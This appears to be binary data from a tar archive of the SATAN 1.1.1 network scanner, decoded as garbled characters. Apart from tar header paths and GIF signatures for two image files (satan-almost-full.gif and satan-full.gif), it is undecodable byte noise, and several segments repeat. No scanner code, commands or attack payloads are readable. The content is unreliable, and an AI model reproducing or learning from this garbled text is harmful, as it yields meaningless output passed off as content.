.!8!▐íM├..╚ì..íΣoÉâ..╚L+ªa..\πcq.┬"}¿.HDßóσê.∩Æ`.N,âcB3..p≤úy╪α.W. ..2▄$./╦º..ò.'ñ".í..;▐íM├..╚ì..íΣoÉâ..╚L+ªa..\πcq.┬"}¿.HDßóσê.∩Æ`.N,âcB3..p≤úy╪α.W. ┴.1.#m.≡σß:. S.┬.É.Σ).÷ .h!.=╪¥╨Ü. s.└ê╧h├.∞Q .┤!)╔º─Φ±.]8)7.╕┴.*É..Xâ}C.╪4BÉ.9.α.6Φé.Ü.Çé.(└.`ª±.╨└&▄d 7.╨.¬&▒Æ.ôæL.J┼<2≤..8Γ.├..7╨.Ç.t..╣IE.÷X─1.└.╫╪X╟¼±..¼..NR..D`.'É!.⌐pB÷Pé─*Σs$.è┼?2s).(┴.▄.█..Éσ.ΘΓ.;╚E┼«aì ╘ß.¿·G(. .]α&.d°G.÷╪.tΣS&╝.Q.Æß${╘!.>..º.$j....X.▀?D.₧q(qu└hC*Z.σë.c▓╘æA.\.èXx'.m╚▐êµ╤o~p'..HF}Ç...dó#p#δï.≡óLÉßBlJσ}┌É.7i$.ï ú-.Ω.ïL┬Iíx.n.░Γ@┼#3..⌡}╚.ü..└₧..G╚π╞ú∩╠├...├G."α─;.c.╓yA.4πΣ8.æ.Fú÷..ëΣ+Xr.Ç"mΣwá..Σ.&:F.Θé..▓ú.n╓╠│.w╔.2╔<.Çgƒ.Wÿ(Ñ/UZy╚à~v.L.6. P─.R.Ç╡q..W╢Pf╪.ÇXX..Æ▓┼=Çæ..T..y╚∙╬┼Σ..`┬>.╚. h╘σ.qº.╓Ià╢ε3─..P.≈┘Gf4Éëñç.╧░ü.q▐Épl]L.≡B}.÷ëP¼╜>Z.@5FÑ.▄.CêNHà"Jò.#f.J÷∩─▌lÉ¢.(Bδ0....É∙▄░π≡▌(}╙.p..h└.W8..╝..#*ê.║╚═84`.▄(.7.I╞}╞!éL°░..∙╗è╓Pç.▄τaè.─.tqƒ∞U#..╓ΣéΩ.ô=Qπè⌡6pB╘.──!...m.nB≡yñ2╘..π»┼=~..╒π&..▓A2 ╝ô.E▄.Kπ.#.qo9▓.ΦP..Ç {bW÷╤ojb.▀≈FeR..0Ç°..H0.ß░ ∞..▒p.╧..N░xRº.vW..0.╓!.'8ü╣...qü$...X π.#÷±..`..`▄..┘│..°.CΦé▌..dÉ.φÉo&╤ .╤ ▌..╢╟x 2.-╚.÷..-0..0.╢r!÷á.╧û 6á.π&"⌐.....U0.e░ 5.à▌0.∞É.E°..F.╣a..b.l╥.Mú.dÉ.φÉo&╤ px╣┴...... .=╘#zg"╔á~.A#â╨.░1.╩Ç.∩@3╒╨ ▒á.÷É..0.¬g.=╘#zg"╔á~.A#â╨.░1.╩Ç.∩@3╒╨ `.╣A....ÑÆ ¿...╨.▐!.-╨..ár/..6ÿ.-.ë.æ.C..TP.J!.╓í.ô0.╚ÿ!╕r.-É.─é....║..Σx ..)Wá.╕q.Ná..ç..╨.▐Épl]L.≡B}.÷ëP¼╜>Z.@5FÑ.▄.CêNHà"Jò.#f.J÷∩─▌lÉ¢.(Bδ0....É∙▄░π≡▌(}╙.p..h└.W8..╝..#*ê.║╚═84`.▄(.7.I╞}╞!éL°░..∙╗è╓Pç.▄τaè.─.tqƒ∞U#..╓ΣéΩ.ô=Qπè⌡6pB╘.──!...m.nB≡yñ2╘..π»┼=~..╒π&..▓A2 pgX..║░."........▒Ç..≡.2≡.╖±.▒α....≤╨..á.ô..╔└.ô0. Æ2X..║░."........▒Ç..≡.2≡.╖±.▒α....≤╨..á.ô..╔└.ô0. ╨.>h!.└..0à.É.╕╤r="j╕≥.C@.|g.πÉ "└....2á$▄ß(.@#╓!j±≈.N@éF╪Æ▐. .á....2á$▄ß(.@#╓!j±≈.N@éF╪Æ▐. .."á~ô..╓G.=!.¿p_.É.╓└.∞╨..p..Æ'.╓÷g╟)╓q.╝ó.▀ù.▄í.=ü.⌡╤ ...∞┴.dá..B─J╓÷÷`.è░.╒..╓░.╓a.▐±æ2 3▀æ..2.└É.╢ÿ.má.a╣ù«Æ.⌐Éæ.┴..p.▀±./a.≤Ç+è .∞Ç+C æ╕Q .`.W└ù-╣'≤..▒╨..É ¬G .Ém≈..ô╨+∞É!6á.▐▒.┌w..i╓▀╤.lÆ. æ ╓æ2▄q.*p └...Çs.á.`╓.-..▀╤.lÆ. P 6É.▐..f.¢≈╤ ┌ùWBÆ.∞.%÷╤ô≈í%.....1.)..⌡æ.#tg═∙.6α.╬y ÷..N╨..╨..1..░.wi!÷≡..É..üÉmá.╒╪.WÉ..@é╒É.▌á.6É₧▀╤ ...╧É.╔.ƒ╓q.=ó..░j∞p.:#è.⌡æ.#tg═∙.6α.╬y ÷..N╨..╨..1..░.wi!÷≡..É..üÉmá.╒╪.WÉ..@é╒É.▌á.6É₧▀╤ ░.,╔.605ô╨.Çá...░j∞p.:#è.⌡æ.#tg═∙.6α.╬y ÷..N╨..╨..1..░.wi!÷≡..É..üÉmá.╒╪.WÉ..@é╒É.▌á.6É₧▀╤ ..÷..Fºá╕╤.dá P..⌡f.∞É.=▓.╛..[┘ ÇÉ.∞..m..╔α.dP.í≡.÷≡0,Ü.1ó.≡..É..üÉmá.╒╪.WÉ..@é╒É.▌á.6É₧▀╤ ≡}3j.╔╨.⌐É./2..á.╜Æ.╓!....W≡.Wα.▒á.▀1.C≡)║░ñ╣!j"≡..á.╝X .á.»∙.└╨.É./2..á.╜Æ.╓!....W≡.Wα.▒á.▀1.C≡)║░ñ╣!j"≡..á.╝X ..▒.ÿπ╨òC@./2..á.╜Æ.╓!....W≡.Wα.▒á.▀1.C≡)║░ñ╣!j"≡..á.╝X α..▀!jg╚.∞..,╢ñ∞╨.╓ j.Γq ..╔≡ì.≥."0.-â{╓╤.└@.D8à▌..Çp.,:..░.╧á..1.╓É .α"Z┬g.......≡.WP.#..▒P..╩ù╓b.▀τ.-á...#.`.σë ......║É.π`..Æ."á."pà░╔ .╒╪.WÉ..@é╒É.▌á.6É₧▀╤ É.y┬.Ç╣.∞É.m.."É.ç·.╧0.12ú∞ .kC.èÇ .└É.╞ó{...≡.. .÷└.∞p..É.é▓áN..╙i.è...╥Ü Ü.╓░ "á3╓. ƒ┬.=╘.'4.┼│<)..║á.≤É!dp!W░ñ▌..C.èÇ .└É.╞ó{...≡.. .÷└.∞p..É.é▓áN..╙i.è...╥Ü á..-└X.╨..┴.1...Éa,f....πp.d░.Z╥.┴j.y└ªPb.óû.d.Ñ.. ╓a..É..`Lπ.ëî╒.C..▌.▒░╔É─ó3. .╓ .Æ¬..@ç≤. W..U{.π≡}Ig+▄▒<.≡ƒ{...`..╨.Np.╔p.O.&6X .r..`.6╨.║└)"░ñd└Ñ∞...p.`BúÇ`+╓ÉÆ└á}.╨¼J9..░x.. .░à█.&.┴..Æ.½.▒W└..`.wZ&-á%Ç`+╓ÉÆ└á}.╨¼J9..░x.. jZ2.m+%╓É.yá3yÉ.πÉ. ".║α╣.╚ÑC0.ô..╕Æ▒`é.∞╨.╓í3╓.p¿.Θ.N░óJ.%⌐..óµ.sZ#⌐░..VƒFh.π..m╨ ?Σ.π[#⌐É.m..▒░.├Θé└0..É.m .P¢.£..dá.î.&.╤ ╕ú.WáyCá.dPÜ=é*W`.S╪. `.Z.&.┴.╓É.╠╓.╧É..y.í .#2.y└ ▌µ......&.┴.ôp.Ç╨.╓Æ.╣..╓╤.║..▒╨.▒0.6 ¬≈æ m≡.╧É :....&...ÑB..@yπ@.╔É.└0Σ▌╨éçÜ. "D╔.&..#.░6...≈┴..v)|≥.╓╥ " .╓..╓░.÷.....y.&)..╬...W┤«└É.Q╫ .P "P*÷p.⌐pB╓..╢.....î.┐`┬.∞..▒á.C..╖ .@┤6ô╨.╧`.Z..╓@.ïτCÇÉ.╧É.`≥.∞æ y└ÿ.╦.m..╧0.ô..C. è@.W≡..p.╔É┤╓q.`≥.-0.N .í...∞æ ╨.d. í..íÉBmÉr└. 7.&φ.. ..CÉB.╨ .╨C".&Có30¢.n2.>D.ÿ.&E!÷╒...╗.î..⌐α&≈.&`.&`"%...;¥╨Ü. s.└ê╧h├.∞Q .┤!)╔º─Φ±.]8)7satan-1.1.1/html/images/satan-almost-full.gif....................................................... 600 . 465 . 506 . 6047 5731343040 14142. ...................................................................................... ................................................................................................................................................................................................................................................................. .............GIF89a≥.v.≡......................................................................................................................................................................................................................................... .............GIF89a≥.v.≡......................................................................................................................................................................................................................................... .............GIF89a≥.v.≡......................................................................................................................................................................................................................................... !∙......,....≥.v....î┼⌐╦φ.ú£┤┌ï│▐╝..σΓHûµëªΩ╩╢ε.╟≥L╫÷ìτ·╬≈... ç─ó±êL*ù╠ª≤.ì─.╥¬⌡è╡R│\µ╢.>~├d▀v.FùwΩ╡;╫~╦i±╣▌U┐δU∙╜┐╘≈'Φ.êP8Xv¿@.╨xáªêÿ(ß╪╚hë∙¿))xûpVëyi`∙8.╔╓.jJ*. zΘ╕hÿ·.Zi ..║█╢Z½ù)█ [╩H{.<..█<z.╠|¬╝îδ·┌█î═╝Im+l¼k╝¥Mj.ΣΩMÿ..^|[z«╛&.▐╦╬ε╓æ>».~.«X╖..·∙ïg/\╛ab.vPHîX&|╗.╓(XφÜª.Ç╨.r.╕.úC>.?┴[σ,▀╜ "ºî$°±ñ│╓÷╪╝┤≡∩c┼{.o*ë≈ fNY.⌡1hΘ│à╨Ñ wNôh.N╥á1╖.%J«$.ñ╘Ωy.Φ*.╫⌐8ÿV╜ t¼Rû⌐Ωÿ.yÆUC▓≥.═─à/.╘Q.╘╥..iiE╕zü6`°╫&╟à4.F]`╕lbôQ¢ .î7r9.~;╔L[o»^l<;¢0╜'┘[┼ 'r#é┌≤j│Ñ.Oσ=.½4╛Fü─û═Tó╩═π~O╤<╥╡π░┤╧A4b;⌐╬╗_?m4─"·╦▄:g╓├~..≈░;.çOR╘±B╣╓ïh┐=.ùy╪ñ╧τ".╓⌡ô▐≡.╫.6)┼{█¥╥S..A.▐..ªü`e╚ê╡ ..^ß╓b4.5í}!Σß─Pδlò!âΣx°àÇ⌡╣WùOà÷╪.-G.─╫MèT┼▐ïKΣÿ┌]▐┘h ─0 ╘╧î'.╓ç.≈AτÉë5~HΣê>ráΣ.Q.y┌ôP╓┬...╡╟$U.▓Ç£...╣┼ò#z3ÑÿÇÿ┘Ñ$i┬..¢mJ╓α¢.ÿüê£ÇΘ9_0xÉ⌠%û|╢Ñ╩áü▓a¿÷i$Ü..v~╔hòæ┌BΘíΣZ┌º.┼&6)áÿriGº\ê║┬ª╥æZΩº)▐üjÇ¥¿┌j¬ƒ╞╩.¼»╬z+ª┤ª└µ«.∙z..⌠..╚.─σt.¼K2$[ªó╦j╩∞σ╞B¢½éò·.φ\╪NKO╡╓vδl.┘Γ4«.fû½%*Φε.├║÷¿ï┼╣╫╓Dí¬CB`j.εó├╥╛½.·f╛╛┘.░}.z┘╫╜N⌠J m┬.2<¼û 7.1╕⌠ÆÜN┼ô$<± .ï;/╛ÆÜN┼ô$<± û.∞┴AI<▓ aΓ⌐)╩._⌠±╖.G└"g)≈`≥£]F║σ╔╧σ∞s+6╜<40h─,¡╨.â£ΣáO╤╦4╨s«.&¿"G-uª.rK&g9_φ.╗,/├û╪*ú·5╪PK╢H┌.ù╜╡╕╛╪K«╦]+57┐d█¡ºmH╫*.╝wK╪÷╥Xol8╔V.}╕úp├q┤▌ìï.ÿ╕╟æW.3ΓP.z∙┌φ║}σ═╓.╜8▐áç48╓æ°╚╦Θq½φ╧δî╦:X╓62·4═ >7≤╒╕╦«3ÿ«ù>▀∩⌐¢-|¿(./:±╝../≡Z╙«<µû.∩.≤╒╙£L╤½_.╕─ôû(∙Σ]|?>?r.ìΣπ▒ô.}vTσæ▒.⌡╬╛╢╓{î.°╢≤ê│.╤ ~±πƒ.pU╛╖ PpQÇ.█.x@]Uüü.≤╙.-8╜┐8Px▌┘¢.í╘""9pâ╪ïá╥28*V.╟.E╩ƒ▐`eñû.îj÷._v\¿?.JêΣ.<ƒ∙th+.j¿@<l.Y╞÷úCσmâ8.Bσ ╘─.÷nÇß.S.₧ÇHE#╥ÑêÉAáôh¿@╟¡.fTëΓ.)ñ...h~°╩..ìú.≥=.=í·═è@P2.¬QwIsó.òe.╘╨¬êf.DlbEH;┬╬\\ñO▒.)ªF:.;E"`.█.F.≥jg.0π 3.à.┼▒p▄c.BΦ7║÷iª@.⌐í.O╪¿,.▒^▓.^(ki╦.┴.ù┘..Z╓2FN╕+30δ./═⌡.V.3t╗.\W\e╔,.╙.g..-█ò└≤MSï┴.É5├û(9FS.╖⌠D▀Ω╥Ht±F2╣█.8ct6q╬╥.≥$Itb(─.N.₧U┬P▐Æê!▄î╞%.c█.Y│.µë!=cY≈..τª₧∞Ω*..f;}#ƒó. ER─.è<╔╚eσ.÷ƒSF╔÷Y¬JÜ÷ú(òU.█2╤êÉ▒iε.╟⌡╘.╥=Ü.r&}(:èâ¿Kσ.0σΘ╘P9J╟aH▓ú ±⌐H.g╙Üªσ⌐.:Ñ/òJUVî╦(KE.$µ2U¬╩▒í╔─.7uòQ.∙MñdmΩWy╔PΣΘï?]ÑâS.:4cRQI╔Rf]wW.}n%░gà.I»║╓..V¬Σ.º.╙F╤^₧τ─àeτ]g°=.╓uüBr,╔┌ ░╦n.┤╔┤è`çH:╜B'¡ò5H┴ÜY╙┘MfJc2eT.3..=.»^âΣ⌐┌╪æ.≥δ=╗▒.>...┤─ó'K{aΣb'°!hhß..¡┘E.┘0æ.╒t-╜.±║½Iε╔.ú╘DL.╦╚P~RF...εx╜v┤ç▐│Laìπ║▄B.┌2⌡5φ..@D.Fvm≈σgó∞₧.JM:╛ê┤Æò¢?╣íR±╪╫W. ªτ╬╓ìUε∩8╛@¿o?\╥â.╨½▐$∩{æ╩┬æüÆu±..ÇaT▐.æ╓Já.█z[Bπ.╫ìhτR*╧8Σ..[gS╟ò+▐╪╕¼╖zv─..¡hO÷Σ%∩Iª*╦ÑEÜ<┌.W≈─Σâ¡e7D╔Ç╓'cù▒≥æ.ïM&#sàCFIe╔cf`óY╬▀æ2..ï_¿╝9┐½σφ÷█,.ß_yge╧Uì/╜╝╔╙vSMbF.▀.ìΦEky═Wv╤k┼╫Z╗▓.╦T÷÷..U?.ç.┴ëv ─Vw9îÉ9│<¥3 à+Θ.«SÇÿσ.εñ.Xc.┘¢╫.1┼·JΩG~º╟($¼·v.l$SÜ╧UN░ó..µ═r9j₧4»╙6ìΦc≈ï¢╠│3╪╞╫▐.gs.Qσ⌡+╜▌ªrº▓Σ┌N╫╢âèε_C;╨ûε¼.¥4nae┌╤.«Zn∩.τ⌡^°üé4r«ƒφk5▀y┌·╞ß?⌡▌₧vo°┼.o╕i÷╠5.WzΓ[.8╖\..╗µV`≈K.╒Zàm∩╓9πuVw▒_εhâK┼╒.wy¼¥│o.Ü#\w:n_H¥▌σê¢.µé╛.▒≥7ì'╡xU8╬7ÇYDßH│E╡┌█┌|.=pαF.ôjΘu⌐3L ⌠è╧;% ─ó═ï₧ß0Kx└{╘╣╗çM=d$|ε╓╞u┘╗.s<7ëε;▓≈╗├µ÷╩┼Θ½$-êU╫.-."+┼kΩΓPÑqgu⌡;»∞3î┘C╛▌.üÜ┘>».╥±╕DQÆ½╨£┐j╝ì▌╓]wr⌡p.u╬..°╛.Φo≤.ÿß▒..y[.╠'z«╒Éê{Ç│∙⌠.─}.}OΦ▒¿z-X±ú╘;Θ╖┬½~┘┬ƒ≥Σ!ε{α6H@╚I9δ┐Oδσ╜₧zà$n.δ]pòçƒc▐.∙ñß⌠.C.^>°N∩8█ù.∞.O.╝╧G╓⌐╘~!.|Æó^P╢ ┘GΓàÇΓü~.≥_┌º/.5lN╙h.╘|rw.ûu.' ~╞'?≥░Ç ..Σs{.ù{╜ùü..yƒ┼╫⌠v±┼:N÷WC'v.ò&╥.t.╚xù2Gú≈Z╙╟Ç¬æé─.Igºp.┬c÷╘=!ΦJ.H}╤uIj⌠y.Ñw.┼~Ñ.zñ─â?≈ΣMr.L╕r¥µ&»╞L╛sé⌠.σà╥,Ghéár}∙.}3HâGó.]7a.▒cgx$╕╡}.g.╓0zÿôσ)⌠vÜû^8êàgéΣ+.~╘!▌.ëP╘.P4Σ"hçèê&/┼w└..d-÷.â╪O∩▓d`.è╟┤éó(y+Rë..T⌡'S≥'ç.cwü╪ ╧Wèlà.╚'p═sïOÑ ╫╖êF╘ï╛╚.Ñùêx(B▒.~╜5F2σü╔ÿU¢D]IΦ.≥t^╤X,.í0æ┴O-êì.σ..¿\{°ìr#]·P.÷.îσÿR╫±KwE\─╟─5ß.'$.É8~≤hrûªgRwx·(ìPç.÷▒.║.É╨w!..w∙xÉ.ú..(k╩...2{σÇ`½╚─F..»ay...6Ñë ┘ÉêW┼.╤#.┘Éµñæ.9Æ.q.(ëSs%.&┘Æ8│.0YôZ'σ9ëQ╫╚ô6Θü?i98)÷« X÷Gë÷I)÷...;░..VƒFh.π..m╨ ?Σ.π[#⌐É.m..▒░.├Θé└0..É.m .P¢.£..dá.î.&.╤ ╕ú.WáyCá.dPÜ=é*W`.S╪.÷.îσÿR╫±KwE\─╟─5ß.'$.É8~≤hrûªgRwx·(ìPç.÷▒.║.É╨w!..w∙xÉ.ú..(k╩...2{σÇ`½╚─F..»ay...6Ñë `.Z.&.┴.╓É.╠╓.╧É..y.í .#2.y└ ▌µ......&.┴.ôp.Ç╨.╓Æ.╣..╓╤.║..▒╨.▒0.6 ¬≈æ m≡.╧É :....&...ÑB..@yπ@.╔É.└0Σ▌╨éçÜ. "D╔.&..#.░6...≈┴..v)|≥.╓╥ " .╓..╓░.÷.....y.&)..╬...W┤«└É.Q╫ .P "P*÷p.⌐pB╓..╢.....î.┐`┬.∞..▒á.C..╖ .@┤6ô╨.╧`.Z..╓@.ïτCÇÉ.╧É.`≥.∞æ y└ÿ.╦.m..╧0.ô..C. è@.W≡..p.╔É┤╓q.`≥.-0.N .í...∞æ ╨.d. í..íÉBmÉr└. 7.&φ.. ..CÉB.╨ .╨C".&Có30¢.n2.>D.ÿ.&E!÷╒...╗.î..⌐α&≈.&`.&`"%...;¥╨Ü. s.└ê╧h├.∞Q .┤!)╔º─Φ±.]8)7satan-1.1.1/html/images/satan-full.gif.............................................................. 700 . 465 . 506 . 24770 5731343040 12671. ...................................................................................... ................................................................................................................................................................................................................................................................. .............GIF87a".H.≡......................................................................................................................................................................................................................................... .............GIF87a".H.≡......................................................................................................................................................................................................................................... .............GIF87a".H.≡......................................................................................................................................................................................................................................... ,....".H....î┼⌐╦φ.ú£┤┌ï│▐╝..σΓHûµëªΩ╩╢ε.╟≥L╫÷ìτ·╬≈... ç─ó±êL*ù╠ª≤.ìJº╘¬⌡è═j╖▄«≈..ï╟Σ▓∙îN½╫∞╢. ┼╦τ⌠║.─╧δ≈.╛ìJº╘¬⌡è═j╖▄«≈..ï╟Σ▓∙îN½╫∞╢. ..(8HXhxêÿ¿╕╚╪Φ°..┘. YiyGy⌐╣╔û╔∙.:µ.JZÜ5jÜ¬Ω.Ç║· KΣ.K[╗3k¢½.╙║δ.δé.<L▄╤[î£╝q¼▄∞.!.,φ╠<m-]}¡¥.╜φ¡█.-.¢=nN.~«.Z╛ε~ΘÜ«............................................................................................................................................................................................... n╪^┼.Oƒ╧ƒx▀.É╤┐Ç.φφ+êÉ╧└Σ.o.9╪0Γ.ê1.J╝X╟"╞.ìB(.≤╚1$.ì"K₧!i2σìL -áT.sbKù1k.i╡∩Ñ.¥6{.δE⌐[POBg·<j.τ╨.⌠x"Mi.Z.áJ.÷╙Φ⌠)╘¿.p.¿║S)Uf.╔B╦¬╡ƒW.k¡è. ╖Ω█.φ┌&αÜ6ƒ]╖ H▓¼╓V¼█╖`┐2(î.o^~v│.Mî*«d╣÷.â╜║≈εbñ^»Zà.u2ß¥â..╛,.B8┼¢╟┼..;┤c╙ºiw6Ma ┌╓jI#^.╪÷1ß┤/d.╦█$P╛ƒS┼.~[≡Φ╩╦]ε=₧╝ßπ┴Ñù┼.M<¼σ┌╪.7▐¥▌]≡ε┼┐wµn[6t╩Ñ%áf¥..╤╣.σ6.┼.qT.h.\Γσº\bσI╟.Ç.>╚^|w±w.~.b.╧\∞±%£|.q.Γ|│ßFùà.>C╓â╖uGáâ╒.≈[_ú╔x"F ║°ßσ...at..6aj.*XúvÉIW.ï├φ╫ƒè╧æµßuδ.id÷".╫#â0.╪£σ▓üFÑDKæ.ƒôó...─│.Yëëa&┼Σ┼f╬ëfuY≥..<o>..uc▌Θg\=Z╣ΓÉ5╕╣g!}^┘ΣáO.Θgûê1G.óë┌#i£*~╔aç> j¿L']*.Σ.¬╣eÇƒ╬ÿτíiXJj.ïv) lsNG"ºó╛.½,╓óΩ.ñü:╫!₧.╡..k»▓J.₧û╬>Kfy,áwE▓╩.#)÷t>gá░╤Z½..α^k£o.v║óº...¥f/P{╩╕ΣVp&║σ¥┌dx.▓╚▄ñ*└½.└.▐Jfn½zyεù\f╩¡╝`╬ßpH.Z÷∩¡ .jk├.¢.1ìvt▄Ü└C.╣í¡⌡σ║1à â╠Σ╚ùnjƒâ┤─I⌐Æ.┼W,|.╗∞.╦'.║m¡î─)$│▒╡║á┤╞∙╠╩╝+⌐*tëCk¼r{.+╞3.L;═εª83[+├Ç}Éu.es¥.─]▀î σ┌Σ╓σ┴┘bl}-╨k¢Θ.ç..Θ%[è╥.+╘xç..½:#ló▄#.nc▀dº,⌠░ B.;ú┐3)n.π*Θk▀╖âW.¼£├..Ñ╗K/ó9gbC╛▒─^ù£d½│D╬╣.ÿ╧.┤Σƒ.∙6Γ¼╙«{ΩE.┐'┴½.>á═╕:¢┴φ¥á.∩∩╡⌐¡ª|ÑºΦƒS─o▒=é┼▓=║∞N*y▒╞═w.0·?½δ÷╘▀._sτ¢î½╛~─6.┤╖╥≤▐ò≤r°_?╡∞oÇE;O╬t5?p∙. ∙.├Æ┤?6%m).Z ...@.QΣÇ.¼ ╪°fè.nn5∩ßα∩¿╟»~.eo%.í \╕╣│α»m½ï╓ü░T@P¡.σ/ΣírÜ2 :!mt╕B╬o┬µ╕.▄(.>.aτ╓╡╗.è─c`.ô.▀Üÿ.,:Q5&î╙▌Tà«±\∞#±│.⌠.7.!>.Pe¬ÿ╬.╡#.,╤..,.÷,û; . obï¥uV..-─░L3úís·╪E.∙q.└!D..Ñ)>▓)x█╓N₧¬v.╛∙KFH·█.E..5Ü.ë44Γ.ZTº⌐,..éΣè╢ê╚╢ú╒░÷Ü┤ñ╜jû+≥9ΓæaÜ"╟ .¡.~╤ì.ú▐&.╥╩ÜαqrAlf█°°¼b&,.╝,╥e^.╣Y6R_╤îc. ÑºOé e┌¼▌─î╫).&s.╒TV"╒╒Ft.._δTB=c╪;≈┴î÷ÿñ ╬n(FI┤╙─∩l¥∙─Φ-.Γiáï.g╣..├I╥u╤m÷ó▌7≈╙&σÆ |&▄cE»Y/aª(úJs(.ê÷╬▐╒.Σ╓±╧G⌡æDô÷/é÷r)MK)Ñ.±┼ñ;ò)íé.│>û.₧;═⌐?K.è₧·÷)y£a.Ox@újï..M.╒╬y╒╓▌iª "YUπP╥Ñ"gû παS╖├┼.Y┼.b=╦P.:+F┬ i»╕gB▓╩╤..5¡%╩┼W≤Æ/▓.3U{eΩ∞└╤V..ôu[╒ƒ┴<÷ê┐..«Dà╤$só╓╚J÷e╦δg.o9>≈î╒¡}üΣR.█╝╖.÷¡ô.d╠.XF╘>╬á¼σ.∞╬.█1╩6n8╠!^┘W╦╦┘5.#▌φ8⌡.╚*¿ òôaUÑ&Bi\ t0[..µp┐.▌Φ╥+»÷½¼ßf║┘?47║û╗┼╩┌º;├σw.δ.∞1Oàª│jI╛..o-∞δ╙≈.èï«½«b5╪^eû÷p⌡U.ON;..:t╝Σ$ÆyL╣┤.ï.┐u╙ëα╛.╓:Q.ò╙É≡E6\█∙└/┬┌U.ê.{╙ΣE°║OP≡.ü░.Eσv╞ <▒?╝YΓ IWƒ±╘╘ ùßbjN.╟É.rpì.E9┌ÿòòd1Aα╒╘.OU┼τsr╦nΣßÿ@╓fQû^jU.╛,.o-∞δ╙≈.èï«½«b5╪^eû÷p⌡U.ON;..:t╝Σ$ÆyL╣┤.ï.┐u╙ëα╛.╓:Q.ò╙É≡E6\█∙└/┬┌U.ê.{╙ΣE°║OP≡.ü░.Eσv╞ É5c╦fi╤Zπ║^O╠.Yr_╔C│╤╩Y╟F«δ.┘lú+╢º┴tëφvcA.e<k╟M{>½▐ª╔ß╙í.¡t]0íM.╔Σ╜Fûèε╩Vw┘R+oCnòd«/δ`F¬ùû¿½Éª;î9;A÷╥.╙φƒMÑIjª±╘╘p≤¼æ║Ω·2·┼ê«%)lm╒│íyYß#±─ü=ê SI┘σÜπGêRe%#;┘╙~J╡╧¼D│£÷+1σ─╡..m╨╕,├=.7 . `RâÆ╩╕.N.═Md,TmZ.▄÷╜X.Zbú;▐2αƒFA∞ε. ÿ▀eΦ6.┬Ω┌{≤Ç┘.qÜ┴..ìcóoαxÇ7L(.p╠∞;╓╘▐¿┼úGgτ▐ΣπZ█x║ú@2⌐.üΣfú⌡*X>¡ç█.µ╪uy)h.≤.Σ3ex8∩B╧φºivú▄Σ+╖∙si¡Ω)`▄vD_┤╤±▌ΓÑ3▒Θ/º·C½⌡≤₧e.╒fKƒ╒.>gƒ#}δ`ƒ¡6.^v.<].dO{┤╜üv╖Wjφ.o╗▄σz.╗▀¥┐y╫.▐.╝─╕á┤╞∙╠╩╝+⌐*tëCk¼r{.+╞3.L;═εª83[+├Ç}Éu.es¥.─]▀î .._Wê▀.»≡└.~≡tG╓Γ≈^°.G~┴..<Γy[y╦_~╟.╤.µ+.Σ╟╟╗±..}ë'.╧₧∩.Q.ΩE.&╘o┤═ªO¼∞K}.eô₧╜╣»Q∩q┐{kóë«üΣfú⌡*X>¡ç█.µ╪uy)h.≤.Σ3ex8∩B╧φºivú▄Σ+╖∙si¡Ω)`▄vD_┤╤±▌ΓÑ3▒Θ/º·C½⌡≤₧e.╒fKƒ╒.>gƒ#}δ`ƒ¡6.^v.<].dO{┤╜üv╖Wjφ.o╗▄σz.╗▀¥┐y╫.▐.╝─╕á┤╞∙╠╩╝+⌐*tëCk¼r{.+╞3.L;═εª83[+├Ç}Éu.es¥.─]▀î .∩.Q{q..╙┴╖╔≥æƒ|┤E▀»╙w°≤í▀.ï_┐ ┬½>╣╢╧.╫?╓'▐wg÷.Y~┼ƒ..δº}.;.~╛.rµ.ìú φ.{.O8.≥?è.[.~æ┼.╖s.±âvÇ 1Çσ%|.xk¬#..87.╕K`%ü-Gü..ü.Q|O╢ü.ÿüè.éx╫yΘg.&°..üéNτ.#xA.╚d-xül7âÿá0°?8h.2¿é:ΦI─╫â5Xz<xW+.h7(Σ%τâ╘σK(âN(.P╪híùΣ/╪é.8W.ΣYê,XΦR.v..σÆ.ΣEXà.3σc°*jHGMxσb╟σσWσEhmn.ΣohüD.éx°ü¥└ç^╟à~╕à_¿ç%¿@╚sàHà ⌠ j.ç╓.sêX*èHà;╘ê╕K`%ü-Gü..ü.Q|O╢ü.ÿüè.éx╫yΘg.&°..üéNτ.#xA.╚d-xül7âÿá0°?8h.2¿é:ΦI─╫â5Xz<xW+.h7(Σ%τâ╘σK(âN(.P╪híùΣ/╪é.8W.ΣYê,XΦR.v..σÆ.ΣEXà.3σc°*jHGMxσb╟σσWσEhmn.ΣohüD.éx°ü¥└ç^╟à~╕à_¿ç%¿@╚sàHà 'ë≥.@╓8.ro≡êuwêpçë£╚}¢Hè>└σƒ╕8çxè.τë¡(.æ¿èMÉè░8tîhïjwÇ╣.u╕╕i╗xç7âÿá0°?8h.2¿é:ΦI─╫â5Xz<xW+.h7(Σ%τâ╘σK(âN(.P╪híùΣ/╪é.8W.ΣYê,XΦR.v..σÆ.ΣEXà.3σc°*jHGMxσb╟σσWσEhmn.ΣohüD.éx°ü¥└ç^╟à~╕à_¿ç%¿@╚sàHà Γg&.îâHx├╚ ╗╚ï¼α<╬σ }hê┬êî╚áî╞x.:Wk╨Xë)Çì┼ÇQ»hìIa,╘`ü╦xe╓≥ì╧¿ì╓ç─Shbσhσ╥8ì..┼±xîεHì⌡╕ç▄XL.╨.┼hΣÜò,óUj╫â5Xz<xW+.h7(Σ%τâ╘σK(âN(.P╪híùΣ/╪é.8W.ΣYê,XΦR.v..σÆ.ΣEXà.3σc°*jHGMxσb╟σσWσEhmn.ΣohüD.éx°ü¥└ç^╟à~╕à_¿ç%¿@╚sàHà ÿÇ..~≈ê┼QHs.êÉ╪╟┼.°7.÷âµx─.╣É≈Gæ·.é.9─∞G?9.Ç..σ..ë"9h$Θj≈╖Æ~ôç)⌐É.╘q'∙Æ=¿Æ≤╕.Vtôk0ï .ô2.H.)+(iô?.╓h.≈æ.∙è.Iï.Y Φ.÷JIë%╕ô.ê.┘Ex╒8ÆF.ò9., ≈Σ∙╟ò2╙σ_╣ôW┘ô½8ûG9uæq;╩╚÷M.+EæûÇWoΓ╕÷.6ùt╔çu±q─Xù>yìúµòO9ÿa⌐ùg.%.gjNΘxq╔î▄HBV╔..σÆ.ΣEXà.3σc°*jHGMxσb╟σσWσEhmn.ΣohüD.éx°ü¥└ç^╟à~╕à_¿ç%¿@╚sàHà 